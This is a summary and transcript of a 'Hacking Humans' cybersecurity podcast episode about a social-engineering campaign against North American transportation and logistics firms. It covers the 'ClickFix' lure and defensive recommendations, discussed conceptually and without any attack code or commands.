Whispers in the wires: A closer look at the new age of intrusion. [OMITB] - Hacking Humans

Summary4 min read

Podcast Summary: Hacking Humans – "Whispers in the Wires: A Closer Look at the New Age of Intrusion"

Release Date: November 5, 2024
Host/Authors: N2K Networks
Description: Exploring deception, influence, and social engineering within the realm of cybercrime.

Introduction

In the episode titled "Whispers in the Wires: A Closer Look at the New Age of Intrusion," hosts Dave Bittner, Rick Howard, and Selena Larson delve into the evolving landscape of cyber threats, particularly focusing on sophisticated intrusion techniques targeting transportation and logistics companies in North America. The discussion sheds light on creative malware delivery methods, social engineering tactics, and the shifting strategies of cybercriminals in response to enhanced security measures.

The Emergence of a New Malware Threat

Selena Larson [03:12]:
"One really interesting piece of research... targeting transportation and logistics companies... Compromising legitimate senders... make the messages actually look legitimate."

The episode opens with Selena Larson introducing a recent cluster of cyber activities aimed at North American transportation and logistics firms. Unlike typical small-scale scams, this operation utilizes advanced malware designed not just to steal data but to disrupt operations from within.

Sophisticated Delivery Methods

Selena Larson [03:12 - 06:08]:
Selena explains that threat actors compromised legitimate email accounts of these companies, using them to send malicious payloads that appear authentic. This method enhances the credibility of the messages, making it more likely for recipients to fall victim. She introduces the "click fix" technique, where targets receive seemingly legitimate notifications prompting them to click a link to resolve fabricated issues. This link executes base64-encoded PowerShell scripts, leading to system compromise.

Notable Quote [06:19] Rick Howard:
"Clicking the link. It's a simple mistake, like falling for a pretty face in a smoky bar."

Human Error and Psychological Manipulation

The conversation underscores the pivotal role of human error in cybersecurity breaches. Rick and the Unknown speaker humorously highlight common mistakes, such as clicking suspicious links or mismanaging multifactor authentication, which can lead to significant vulnerabilities.

Selena Larson [07:19]:
"They did do quite a bit of investigation... criminals needing to do a lot more research, development, trying to be a lot more creative with their delivery methods."

Selena emphasizes the increasing creativity and research invested by cybercriminals to bypass improved security measures, particularly through tailored social engineering tactics that exploit human psychology.

Targeting the Supply Chain

Selena Larson [12:47]:
"What motivation, but I do think it speaks to something interesting about targeting supply chain... could have a wealth of information."

The hosts discuss why transportation and logistics companies are prime targets. Selena suggests that compromising these entities can provide access to a wealth of information due to their extensive interactions with suppliers and partners, potentially leading to broader network penetrations.

Marketplace Shifts and Infrastructure Purchasing

Selena Larson [15:20]:
"They are likely purchasing it from a third party... creating something really compelling... remote management and monitoring tools... trickle down economic impact on the dark marketplaces."

The episode explores how threat actors are increasingly purchasing infrastructure and tools from third-party marketplaces instead of developing bespoke malware. This shift allows for greater scalability and cost-effectiveness, as cybercriminals leverage readily available resources to execute sophisticated attacks.

Mitigation Strategies

Selena Larson [26:38 - 30:19]:
Selena provides actionable recommendations to protect against such threats:

User Education: Enhance awareness programs to recognize and respond to sophisticated social engineering attempts.
Verify Unusual Requests: Encourage users to verify unexpected emails or attachments, even from known contacts.
Restrict File Types: Implement restrictions on receiving uncommon file types, such as URL files, to prevent inadvertent execution of malicious scripts.
Limit Administrative Privileges: Advise against running daily operations with administrative privileges to minimize potential damage from breaches.

Notable Quote [28:08] Unknown Speaker:
"Don't install anything unless you know the other person online that sent it to you."

Concluding Insights

The episode wraps up with a reflection on the evolving tactics of cybercriminals, who are investing more in the initial phases of attacks—particularly in gaining access—while utilizing off-the-shelf tools for payload delivery. This strategic shift indicates a blurring line between cybercriminal and nation-state tactics, highlighting the need for continuous adaptation in defense mechanisms.

Selena Larson [31:03]:
"As defenders, we also have to match their craftiness and creativeness to make sure that we're staying ahead of the curve."

The discussion underscores the importance of proactive and adaptive cybersecurity measures, emphasizing the role of human vigilance and advanced defense strategies to counter increasingly sophisticated threats.

Final Thoughts

"Whispers in the Wires" effectively illustrates the dynamic and intricate nature of modern cyber intrusions, particularly in niche sectors like transportation and logistics. By dissecting the methods and motivations behind these attacks, the hosts provide valuable insights into the current threat landscape and offer practical guidance for individuals and organizations striving to bolster their cybersecurity defenses.

Notable Closing Quote [31:52] Rick Howard:
"In cyberspace, nothing really ever dies. It just waits, hiding in plain sight, ready to strike again."

Stay Informed:
To remain protected against such evolving threats, continuous education, robust security protocols, and proactive threat intelligence are imperative. For more insights and updates on cybersecurity strategies, subscribe to the "Hacking Humans" podcast by N2K Networks.

Loading summary

Transcript110 lines

[00:02]
Dave Bittner
You're listening to the Cyberwire network, powered by N2K.
[00:18]
Rick Howard
It was a cold, cold night when we got together. A cold, cold, rainy night. I've seen it all in this line of work. The grifters, the hustlers, the two bit fishers pulling cons over coffee shop wifi. But this. This was different. This wasn't some small time scam. This was malware. Slick, silent and deadly. My office smelled of stale coffee and burnt out firewalls. The only light spilling in from the monitor in the corner. Rick and Selina appeared, faces lit by their own monitors, each looking as worn out as I felt. Rick was holding a flash drive, giving me that look, like he'd just seen a ghost. Selena, meanwhile, was scrolling through lines of code, her expression hard, determined. I leaned in. This wasn't your average malware case. This was something else. It lurked in the corners, stayed quiet and patient. The kind of code that doesn't just steal data. It aims to unravel things from the inside. They didn't need to say much. The message was clear enough. In our world, the threats keep getting smarter. All you can do is try to stay one step ahead, even when it feels like the game is rigged. And just like that, I knew I was in deep. This case wasn't just any old breach. This was war. And it was about to get messy.
[01:55]
Dave Bittner
Sa.
[02:25]
Selena Larson
Dave, are you coughing because you had too many dips before recording this?
[02:29]
Rick Howard
I can neither confirm nor deny.
[02:32]
Unknown
I can confirm it.
[02:34]
Selena Larson
Well, now that the cooler weather's coming, is it switching from dip season to soup season or warm dips? Warm dip season.
[02:42]
Dave Bittner
I mean, there's a fine line between a hot soup and a warm dip. I think it's a matter of viscosity, but anything that you can put. You can take either a chip or a bit of bread and put it in. I'm totally fine considering that to be a dip. So. Yes.
[03:00]
Unknown
So soupsies are subset of dips is what you just described to us. I love that.
[03:05]
Dave Bittner
Soups are just dips with very low viscosity. That's all.
[03:09]
Unknown
It's all.
[03:10]
Dave Bittner
Yeah. That's fine. Sure.
[03:13]
Selena Larson
Well, on that note, one really interesting piece of research that we worked on recently was this cluster of activity that was specifically targeting transportation and logistics companies in North America. It ended up delivering a variety of different malware payloads. But what I thought was the most interesting was it's a really fantastic example of threat actors being pretty creative in terms of their delivery methods. So in this case, they were compromising legitimate senders. Compromising real accounts.
[03:48]
Unknown
And then actually is there ever an instance where they compromise illegitimate accounts? Just, you know, just wondering.
[03:56]
Rick Howard
Ah, Rick, always asking the hard hitting questions.
[04:06]
Selena Larson
You know, I wonder. Yeah, a hacker hacking a hacker to send to reply to some threat. Hijacked emails. Yes, it's like hackerception.
[04:17]
Dave Bittner
Wouldn't that be though? Like we hear these stories about like malware operators, you know, at apt groups who go in, they get in there and the first thing they do is clean out all the other malware so that it's only theirs. It's theirs.
[04:33]
Unknown
So making room from theirs. Everybody out, everybody out of the pool, right?
[04:37]
Dave Bittner
Well there was, there was, I remember someone talking about, it was like an industrial control system situation where the operator like knew who was in his system, but they did such a good job of cleaning everything else out that they were like, you know what, I'm going to let them be here for a.
[04:51]
Rick Howard
Little while.
[04:54]
Unknown
Instead of paying a third party to, you know, monitor all that. Yeah, let's let this guy do it, you know.
[04:59]
Dave Bittner
Yeah.
[05:00]
Selena Larson
I mean eyes on cleaning house. You know, I could see it, I could see it happening. But yeah, but in this case, so they did compromise the legitimate senders and then they replied to existing conversations within that inbox to make the messages actually look legitimate. So it's kind of interesting because there were two parts to this. This was the first part where they are, you know, instead of impersonating transportation or logistics companies, they really compromised those accounts and then tried to make it seem quite legitimate. Now the second part, what made this kind of interesting was later on in their campaigns they started using this what we're calling a click fix technique. So essentially what happens, the target will receive this pop up or notification of some sort, depending on what the actual attack chain is, and it'll be like, oh, you've encountered an issue. Click here to fix this. And what that actually does is copy and paste base64 encoded PowerShell. So the actor is pretending like, hey, here's this security issue, but here's how you can fix it. But fixing it actually ends up leading to the compromise.
[06:08]
Unknown
So Dave, here we go. You know, we've been doing this for a very long time and it all comes down to clicking the link.
[06:19]
Rick Howard
Clicking the link. It's a simple mistake, like falling for a pretty face in a smoky bar. I've been there. Heck, we all have. One click and you're in over your head. Just like I was when I trusted a source that turned out to be as crooked as a geriatric kangaroo.
[06:41]
Unknown
Okay, that Is that is the entire attack chain?
[06:44]
Dave Bittner
Yeah, Selina, you know, Rick doesn't mind clicking suspicious links. He figures what's the worst they can do? Fax me a virus?
[06:54]
Unknown
Those deadly fax viruses.
[06:55]
Dave Bittner
Ooh. Rick thinks that multifactor authentication is clicking the link twice.
[07:05]
Unknown
Wait, I'm gonna write that down. That is not what it. Shoot.
[07:09]
Dave Bittner
Yeah. Rick falls for scam so quickly, even the Nigerian princes say, wow, that was easy.
[07:16]
Unknown
I want a first name baseness with all those Nigerian princes.
[07:20]
Dave Bittner
Yeah, yeah. Rick has a. I guess it's best to call it an open relationship with all of his passwords. So tell us about this, Selena. What exactly goes into this click fix method? Because I, I've, I've heard about this making the rounds and there's some unique, particularly clever elements of this. Right?
[07:42]
Selena Larson
Yeah. So we initially have seen it from multiple different threat actors. They might be doing fake updates delivery where it'll pop up and say, oh, you've encountered a problem with Chrome. Click here to fix it. We've also seen it delivered via email where there will be an HTML document that says, you've encountered a problem with Word. Click here to fix it. But what was really interesting about this particular ATT and CK chain was was the HTML actually popped up with software that would be used in the course of normal operations for transportation and logistics companies. So they impersonated these software called Samsara AMB Logistic Astra tms. Basically this would only be used in transport and fleet operations management. So in addition to having that identity compromise, they also appeared to know some of the information that would be used in the course of normal operations, how it might be used by the people that they were targeting. So they were really very clever in a full scale impersonation that if you're an unsuspecting recipient, this is a very compelling social engineering technique.
[08:57]
Unknown
So that indicates that they were in their victim's network for a long time, learning about all these software packages that most of us had never heard of. Right. So the question I have, Selena, is what was the entry? How did they get in? You were mentioning they got in through email. Was that the victim Zero is compromising email accounts or is there something more scary going on here?
[09:18]
Selena Larson
So from what we understand, we saw the visibility as the initial access via email. But to your point, whether it was they had compromised some of these organizations and done the research first, or whether they were just familiar with those business practices and done a lot of open source intelligence gathering, you know, looking up what software might be used, investigating various organizations or, you know, what are common practices for this specific type of company? They did do quite a bit of investigation. And this goes back to this idea of criminals needing to do a lot more research, development, trying to be a lot more creative with their delivery methods. Because we as cyber defenders and our industry as a whole and enterprises at large, you know, we have gotten better at security. And so the response to that from threat actors is I have to be more compelling with my lures, with my social engineering. One of the things that I think is really fun about the click fix technique is it'll say, hey, here's a problem, but you can solve it yourself, right? So how, how many times are we so frustrated going to it, running into an issue and being like, oh my gosh, I can't access this document or I can't download this software, you know, what have you open an IT ticket, work with it to try and fix. But with click fix, it says, oh, you can do this yourself. Just click this button. And most people would have no idea that it was copying and pasting and then running PowerShell on their host. Right, like so it's very clever being like, you can fix it yourself.
[11:03]
Dave Bittner
The one that would work on Rick would just say, you got mail.
[11:09]
Unknown
Well, I think it's pretty tricky about all this is they're running an action here that is typically associated with criminals. You know, click this link basically to get something done. But the intelligence that they had to have to make something like that work is, would lead me to believe the attribution is towards some government. So what are your team, what is your team saying about that, Selena?
[11:31]
Selena Larson
So we don't actually attribute this to a tracked threat actor. However, given the actual malware payloads, which is really interesting, they were just kind of commodity stealers. Net support, rat, Dana bot, things that we see typically with cybercrime Fed actors and not really very sophisticated malware. So that was really interesting too. And I think also part of this overall story where we're looking at and learning that the landscape, including cyber criminals are getting a lot better and a lot more clever at the initial delivery, but they're not spending quite as much time or development in the malware. They might just be using something commodity or you know, an RMM tool, something like that, to actually install that payload. So it does seem pretty interesting and quite clever and they are doing a lot of research. But the ultimate payload is something that we see oftentimes with high volume commodity cyber criminal threat actors.
[12:24]
Unknown
Well, Selena, regardless of which side it comes from, either nation State or cyber criminal malware is nothing but trouble.
[12:32]
Dave Bittner
Selina, I'm curious. Why do you suppose that they chose transportation and logistics companies? Is there anything special about them or were they just convenient?
[12:47]
Rick Howard
I knew I needed to start asking the hard hitting questions, otherwise this case was going to take forever and we were running out of time.
[13:02]
Selena Larson
That is a great question. We don't really know the motivation, but I do think it speaks to something interesting about targeting supply chain. So oftentimes, you know, you're doing quite a bit of business and conversation and interactions and payments and a lot of traffic basically between suppliers and the organizations that work with them. And so it could be a very interesting wealth of information. It could have a lot of people that they're going to be doing business with, which could potentially lead to a lot more compromises or additional victims. Or it just could be a case of the threat actor having some sort of knowledge or understanding or interest in this particular vertical itself. So again, you know, the use of these very specific, a tailored click fix using that software combined with the very specific targeting indicates that yes, they had done their research, but also maybe they were just potentially interested in this specific vertical. So we are continuing to monitor it. But I did find it really interesting and it does kind of have all of those hallmarks of stuff that we like to talk about at security. Right? So identity compromise, supplier risk, you know, click fix and social engineering and being very convincing. So it was really all of these hallmarks of stuff that we as security practitioners talk about all the time. And this was just bundled in a nice little package of, oh, this is a really terrific example of how threat actors can be very clever and crafty and get you to do what they want.
[14:34]
Unknown
Something that all the things you just outlined there, there's malware always has a price to pay, even if we don't know exactly what it is, is a.
[14:42]
Rick Howard
Price to pay, to say the least. It's always at the forefront of my mind.
[14:53]
Selena Larson
Stay tuned. There's more to come after the break.
[15:05]
Dave Bittner
One of the things that the brief mentions that caught my eye was that the threat actors are purchasing infrastructure from third parties. I'm curious, what are your insights there? I mean, why would they be doing that?
[15:20]
Selena Larson
So this is actually an attack chain that we've seen or similar attack chains that we've seen from other entities across the landscape. So because it wasn't necessarily specific to this one cluster, we do believe that they are likely purchasing it from a third party. And because of the similarities that we've seen from other Potential chains that wasn't quite as sophisticated, wasn't super specifically targeted. But another thing to kind of think about is as the threat landscape is shifting to try and be a lot more creative, the sellers are also seeing how they can really differentiate themselves in the marketplace. So can I create something that is really compelling, that can be an attack chain, or can I be an operator and sell this to a lot of different users? So I'm making the money off of just the delivery mechanism as opposed to creating really sophisticated, interesting malware that's going to be sold for a super high price. So it's honestly kind of interesting to think about it from a potential market shift perspective as well, where you know, the investing in the tools and resources for the cybercriminals to be able to go to that marketplace and buy these new tools or leverage them or subscribe. Right. Infrastructures, service potentially as opposed to historically what we, you know, see oftentimes is really cool malware, very like customized, sophisticated implants or root kits or things like that, where that tends to be a lot of the focus. So both from a financial resources perspective, but also time and investment perspective, I think it is, it is pretty interesting. And to be clear, you know, Proofpoint ourselves as researchers doesn't have a ton of visibility into these marketplaces. But based off of open source research and other reporting done by many of our colleagues, it is really interesting to kind of see what that marketplace is like now. Also, in addition that the shift away from remote access tools to more information stealers or like the use of legitimate services like remote management and monitoring tools, there's been kind of a big change in the landscape and that sort of have a trickle down, trickle down economic impact, if you will, on the dark, dark marketplaces and various exploit forums.
[17:30]
Unknown
Selena Reagan. Selena Reagan. That's what we are. But Selena, you, you mentioned supply chain attacks and one of the reasons they like to do that is because that traffic most of the time looks normal, right? Until it's not normal and then you know, chaos happens and then you know, bum, bum, bum, it's horrible. So that's kind of the reason they do it that way, right?
[18:01]
Rick Howard
Normal, That's a funny word in this line of work. Normal means something's hiding in plain sight like a snake in the grass just waiting for you to take that first wrong step. And trust me, you never see it coming.
[18:15]
Selena Larson
You have inherent trust in the supply chain. So right, like these are people, individuals and companies that you're regularly talking to, you're regularly sending money to and from you're regularly having this, this previously established trust and communications set up. And so that can be something that's very easily exploitable from various threat actors. I mean, we see it within female compromise all the time, right? So impersonating suppliers, saying, oh, our bank account information needs to be changed or updated. Having these, you know, very creative and crafty customized lures with a domain that's, you know, potentially one letter off of the legitimate company, but they're pretending to be or impersonating these suppliers and across the supply chain. So whether it's, you know, an outright compromise of a supplier that is doubly preying on that trust, or if you're just impersonating a supplier that the person regularly engages with, regardless, you have that sort of like first step into building that trust with the recipient. And that's why they can be so compelling and very effective when it comes to social engineering and impersonation to try and get someone to either click on something, download something, you know, do something very bad.
[19:33]
Unknown
So are you saying something that we don't know what the ultimate objective was for these transportation kinds of companies? Do we not know what they got?
[19:41]
Selena Larson
So we like, you know, from our perspective, we just see the initial access and the delivery of the information Steelers or the Dana bot or, you know, net support ratio. But based off of what we know about these types of malware, it likely is financially motivated. So some type of stealing either data or money to ultimately make money in.
[20:03]
Unknown
The end, is there any thought that that might be a camouflaged operation so that some nation state could get in and get access to transportation systems?
[20:14]
Dave Bittner
Misdirection.
[20:16]
Unknown
Misdirection. That's what I would do. Okay. If I was doing this right?
[20:21]
Dave Bittner
Ye. Yeah. This is coming from Rick, by the way, who once got scammed into buying antivirus software for his microwave oven, ladies and gentlemen.
[20:29]
Unknown
And since I bought that, I have never had a piece of malware found on my microwave.
[20:34]
Dave Bittner
There you go. See?
[20:37]
Selena Larson
Or when you microwave anything, it just tends to be a little less cooked than it should be. No, nothing that we've seen that necessarily indicates that. Just based off of sort of the volume, the regularity, the different types of organizations that are compromised in the malware that's being delivered. I do think it is pretty interesting though. And you know, we are continuing to monitor this, so our assessment may change. Right? I mean, that's the beauty of threat intelligence.
[21:05]
Unknown
Typical. Typical intel, Right, Right.
[21:09]
Dave Bittner
There's a big old asterisk just sitting there, right? Just throb. It's A throbbing asterisk. This may all change. Please don't hold us to anything.
[21:17]
Unknown
We have moderate confidence in this.
[21:19]
Dave Bittner
This is our current understanding is. But please read the fine print. Oh, spoiler alert. It's all fine print. Oh my.
[21:35]
Selena Larson
It wouldn't be a cyber threat intelligence without it. Depends.
[21:40]
Rick Howard
I couldn't have said it more perfect even if I tried.
[22:02]
Dave Bittner
It's interesting to me how much they front loaded things here. Like as you say, it seems to me like they put most of their energy into the front end of getting in, of establishing trust, of simulating these known platforms and then once they were in there, they were just using off the shelf tools to do what they.
[22:24]
Rick Howard
Needed to do then.
[22:25]
Dave Bittner
But it was really the time effort, expense was into that initial access. Is that accurate?
[22:32]
Selena Larson
Yeah, absolutely. And you know, we kind of joke and laugh about, you know, espionage versus cybercrime and could this be. But I do think it is kind of an interesting conversation to be had where there is right now an evolution and an increase in sophistication from cyber criminal threat actors where they will spend a lot of money and time and resources into developing that initial access where historically we could. Oh, sorry, there's a.
[23:00]
Unknown
It fits right in with our film noir ghost.
[23:04]
Selena Larson
My house is haunted. I apologize. That was my friendly ghost screaming as it walked by my office.
[23:11]
Rick Howard
Don't look at me. I have no idea what that was.
[23:14]
Selena Larson
But yeah, so it does kind of fit as part of this overall trend in the landscape where we're seeing this investment in time, energy, resources into the initial access. They're being a lot more creative, a lot more sophisticated in developing some of the, you know, like Dave, you explained front loading the attack chain, but are.
[23:31]
Unknown
They doing, are they trying to develop exploit code or they're going in through social engineering because exploit code's expensive.
[23:38]
Selena Larson
Yeah, so that's, you know, that's a great point from, at least from the email as an initial access perspective, it is very much an investment in social engineering and new attack chains. So it's not necessarily developing the exploits themselves. We have seen occasionally the use of some zero days or end days. As soon as something drops, you know, they're very, very quickly adopted into these overall attack chains. But it does kind of bring up this interesting conversation where historically we have had this bias in cybersecurity where espionage apt actors are the ones that are the most sophisticated. They're the ones that are going to be the most clever and crafty and they are, you know, the people that are investing a lot into those resources. Whereas you know, cybercrime used to just, you know, deliver a malicious attachment or here's a malicious link. But now, you know, there's, there's a lot of overlap in ttps from espionage and cybercriminal threat actors. There's a lot more sort of creativity and investigations and time going into attempts to exploit people. You know, I love thinking about how people are getting creative with social engineering. I mean, the click fix thing, I think, was really a very, very clever social engineering feat. Right. Getting someone to think that they know best and to do something and actually infecting themselves. I mean, how clever? Right. And so that's why we see it being used so much now is it started off a little bit slow, but, oh, wow, wait, this is actually really effective. People like fixing stuff themselves and they don't have to talk to it, where, you know, focus on a little bit kind of like the human psychology aspect of it as well, where threat actors have to think about how is a person going to respond to this. Right. Like we're, we're increasingly trained as human beings and people to not just click on something. So we're not just going to click on something that's obviously malicious anymore. We're not just going to download something because someone tells us to.
[25:24]
Unknown
You clearly haven't talked to anybody. In my family. Family, Right.
[25:27]
Selena Larson
So as a whole, in general, everyone besides Rick.
[25:32]
Unknown
Oh, no, I click on them all the time too. So I'm a poor example.
[25:37]
Selena Larson
Yeah, the sort of like human psychology. Right. Like, if we think about, like the Hercule Poirot of cyber investigations, the little gray cells and the human psychology, you know, how can we, how can we use that?
[25:50]
Rick Howard
Hercule Perot, we had one word for someone like that, and that word was chump.
[25:56]
Selena Larson
To both better educate people, but also from a threat actor perspective, you know, how can I use my little gray cells to get someone to click on something or engage with something that they otherwise wouldn't? It's interesting to see that sort of whole evolution. But then of course, we are the good guys and have to figure out and be creative with our defense and to prevent it. As we'll be right back.
[26:35]
Dave Bittner
Well, let's talk about mitigations.
[26:37]
Rick Howard
Let's bring it home then.
[26:38]
Dave Bittner
What are the recommendations here for folks to best protect themselves?
[26:42]
Selena Larson
Yeah. So I think if we're talking about it being a very human sort of targeted threat, it definitely has to be a human educated, human awareness, I think, plays a really big role here. So I think, you know, especially when we're talking about stuff that looks legitimate and people essentially infecting themselves. It's so, so important for organizations to really educate users on this new technique. Also, I think it's really helpful to remind folks that even if they are engaging with someone or they're receiving something from somebody, even if they'd previously talked to them, if it seems out of place or if it's a file or an attachment type that you don't typically receive. So for example, this was an Internet shortcut URL file in many cases or an HTML with an embedded Internet or URL file. Like it kind of makes you go huh? And really realize like the threat actors are being a lot more crafty. So we have to be a lot more mindful in terms of how we are thinking about and educating our users about common techniques used by a lot of these threat actors. And you know, I think it can be a little bit difficult to defend against some of this stuff because so much of it can be like legitimate or you're essentially infecting yourself the copy and pasting to run run PowerShell. And so a lot of it is just kind of like user awareness and report.
[28:09]
Unknown
Let's be specific here. Right. As a general rule, don't install anything unless you know the other person online that sent it to you.
[28:16]
Selena Larson
Oh, absolutely.
[28:17]
Unknown
Right. And so that would solve 80% of this. Right. The other one I always give to my family and friends is never do your day to day operation running as an administrator to your laptop or your phone. Right. That would also clear up about 90% of this stuff. Right. So those two things would keep you out of a lot of hot water. Dave, you like the hot water, so maybe not do that.
[28:42]
Rick Howard
Yes, I do.
[28:43]
Dave Bittner
I actually spend way too much time in my hot tub. I am a wrinkled mess is a.
[28:50]
Selena Larson
Hot tub, if not just a non viscous dip.
[28:55]
Rick Howard
No, it's chewing soup.
[28:56]
Unknown
Not even callback. That's what it is. That is very good.
[29:00]
Dave Bittner
That's right, that's right. But Rick, I mean to what you said, just said there don't install anything where you don't know the sender. That was part of what this was about, right. They were convincing the people that this was a known entity that this is. Oh, nothing to see here. This is software that you're familiar with and even more so this is niche software that only those of us who are in this special club even know about.
[29:28]
Unknown
So yeah, it's easier to say than do. Okay, I totally hear what you're saying that you know, this is a professional social engineering attack. But the first thing anybody should do when presented with an email from looks like the IT department is to pick up the phone and say, hey, you guys, are you sure this is what you want me to do? Because I'm an idiot about this stuff.
[29:51]
Selena Larson
Yeah. I mean, even from, like, that side, though, like, restricting or flagging when an unusual file type is received. Right. So something like a URL file, it could be potentially used in legitimate enterprise operations, but you're probably not sending those back and forth all that often. So, you know, things like that, too, where you can have some of these access restrictions or file restrictions on individual users to kind of prevent a little bit of that. But, yeah, I mean, trust no one.
[30:17]
Unknown
Trust no one.
[30:20]
Dave Bittner
Poor Rick. When they get Rick on the line after he's given them his credit card number, he says, hey, why don't I give you my Social Security number just in case. Just in case you need it. It might save you a call later. Let me just give that to you.
[30:32]
Unknown
I don't wanna do this twice.
[30:34]
Dave Bittner
No.
[30:36]
Selena Larson
Well, that's Rick's way of making sure that he's so secure, is that all threat actors have access to any of his potential data, and so none of them even try to go after him because they know everyone else can, too.
[30:48]
Unknown
I'm an open book.
[30:50]
Dave Bittner
That's true. Rick's passwords are so old, they come with an AARP discount. All right, anything else we want to cover here, Selena, before we wrap up?
[31:03]
Selena Larson
I mean, I think we pretty much hit on all of it. And if I would leave anything to, you know, to our listeners is to just be very mindful and think about how we can better educate and be aware of the increasing craftiness of many of these very sophisticated cyber criminal threat actors. Because, you know, they're not going anywhere. And we. We as defenders, also have to match their craftiness and creativeness to make sure that we're staying ahead of the curve.
[31:32]
Unknown
For you, Dave, that means just close a laptop and walk away.
[31:35]
Dave Bittner
That's right. And right now I'm going to walk away. I. Waiting in the other room is a whipped ricotta with lemon and olive oil dip. So I'm going to go partake in that. Thank you both. This was great fun as always. We'll see you next time.
[31:49]
Unknown
Thanks, guys. See you later.
[31:51]
Selena Larson
Thank you.
[31:52]
Rick Howard
And just like that, case closed. But in cyberspace, nothing really ever dies. It just waits, hiding in plain sight, ready to strike again. Like an old tuna sandwich in the back of the office fridge. You don't see it coming, but when it hits. It hits hard. Well, I guess there's nothing left to do for this old gumshoe but to read the closing credits. And that's only malware in the building. Brought to you by N2K CyberWire in a digital world where malware lurks in the shadows, we bring you the stories and strategies to stay one step ahead of the game. As your trusty digital sleuth, we're unraveling the mysteries of cybersecurity, always keeping the bad guys one step behind. We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the ever evolving world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. This episode was produced by Liz Stokes, mixing and sound design by Trey Hester with original music by Elliot Eltzman. Our executive producer is Jennifer Iban, our executive editor, Brandon Karp. Simone Petrella is our president. Peter Kilpie is our publisher. I'm Dave Bittner. On behalf of Rick Howard and Selena Larson, thanks for listening. Stay safe out.